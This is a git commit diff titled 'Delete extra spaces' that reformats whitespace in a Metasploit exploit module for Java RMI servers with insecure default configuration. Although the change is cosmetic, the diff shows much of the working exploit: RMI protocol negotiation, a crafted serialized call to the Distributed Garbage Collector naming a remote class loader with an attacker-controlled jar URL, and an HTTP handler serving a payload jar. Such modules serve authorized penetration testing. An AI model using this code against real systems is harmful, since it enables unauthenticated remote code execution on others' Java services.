Delete extra spaces
jvazquez-r7
parent
e6fbca716c
commit
c60fa496c7
|
|
@ -16,13 +16,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'Java RMI Server Insecure Default Configuration Java Code Execution',
|
||||
'Description' => %q{
|
||||
This module takes advantage of the default configuration of the RMI Registry and
|
||||
RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it
|
||||
RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it
|
||||
invokes a method in the RMI Distributed Garbage Collector which is available via every
|
||||
RMI endpoint, it can be used against both rmiregistry and rmid, and against most other
|
||||
RMI endpoint, it can be used against both rmiregistry and rmid, and against most other
|
||||
(custom) RMI endpoints as well.
|
||||
|
||||
Note that it does not work against Java Management Extension (JMX) ports since those do
|
||||
not support remote class loading, unless another RMI endpoint is active in the same
|
||||
not support remote class loading, unless another RMI endpoint is active in the same
|
||||
Java process.
|
||||
|
||||
RMI method calls do not support or require any sort of authentication.
|
||||
|
|
@ -32,14 +32,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
# RMI protocol specification
|
||||
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
|
||||
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
|
||||
# Placeholder reference for matching
|
||||
[ 'MSF', 'java_rmi_server']
|
||||
[ 'MSF', 'java_rmi_server']
|
||||
],
|
||||
'DisclosureDate' => 'Oct 15 2011',
|
||||
'Platform' => %w{ java linux osx solaris win },
|
||||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
register_options([
|
||||
Opt::RPORT(1099),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
], self.class)
|
||||
register_common_rmi_ports_and_services
|
||||
end
|
||||
|
|
@ -91,18 +91,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, re-raise
|
||||
# When the server stops due to our timeout, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delay
|
||||
raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
|
||||
raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
|
||||
rescue Msf::Exploit::Failed
|
||||
# When the server stops due primer failing, re-raise
|
||||
# RuntimeError so it won't wait the full wfs_delays
|
||||
raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
|
||||
rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
|
||||
raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
|
||||
rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
|
||||
# When the primer fails due to an error connecting with
|
||||
# the rhost, re-raise RuntimeError so it won't wait the
|
||||
# full wfs_delays
|
||||
raise ::RuntimeError, e.message
|
||||
raise ::RuntimeError, e.message
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_header
|
||||
ack = recv_protocol_ack
|
||||
if ack.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
|
||||
end
|
||||
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
|
|
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# JDK 1.1 stub protocol
|
||||
# Interface hash: 0xf6b6898d8bf28643 (sun.rmi.transport.DGCImpl_Stub)
|
||||
# Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))
|
||||
# Operation: 0 (public void clean(ObjID[] paramArrayOfObjID, long paramLong, VMID paramVMID, boolean paramBoolean))
|
||||
send_call(
|
||||
object_number: 2,
|
||||
uid_number: 0,
|
||||
|
|
@ -180,12 +180,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
p = regenerate_payload(cli)
|
||||
jar = p.encoded_jar
|
||||
paths = [
|
||||
[ "metasploit", "RMILoader.class" ],
|
||||
[ "metasploit", "RMIPayload.class" ],
|
||||
[ "metasploit", "RMILoader.class" ],
|
||||
[ "metasploit", "RMIPayload.class" ],
|
||||
]
|
||||
jar.add_files(paths, MetasploitPayloads.path('java'))
|
||||
jar.add_files(paths, MetasploitPayloads.path('java'))
|
||||
|
||||
send_response(cli, jar.pack,
|
||||
send_response(cli, jar.pack,
|
||||
{
|
||||
'Content-Type' => 'application/java-archive',
|
||||
'Connection' => 'close',
|
||||
|
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
new_array_super.description = Rex::Java::Serialization::Model::NullReference.new
|
||||
|
||||
new_array_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
||||
new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')
|
||||
new_array_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.rmi.server.ObjID;')
|
||||
new_array_desc.serial_version = 0x871300b8d02c647e
|
||||
new_array_desc.flags = 2
|
||||
new_array_desc.fields = []
|
||||
|
|
@ -259,13 +259,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||
|
||||
new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
||||
new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')
|
||||
new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'metasploit.RMILoader')
|
||||
new_class_desc.serial_version = 0xa16544ba26f9c2f4
|
||||
new_class_desc.flags = 2
|
||||
new_class_desc.fields = []
|
||||
new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
||||
new_class_desc.class_annotation.contents = [
|
||||
Rex::Java::Serialization::Model::Utf.new(nil, jar_url),
|
||||
Rex::Java::Serialization::Model::Utf.new(nil, jar_url),
|
||||
Rex::Java::Serialization::Model::EndBlockData.new
|
||||
]
|
||||
new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
||||
|
|
@ -278,7 +278,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
arguments << new_object
|
||||
|
||||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")
|
||||
arguments << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00")
|
||||
|
||||
arguments
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue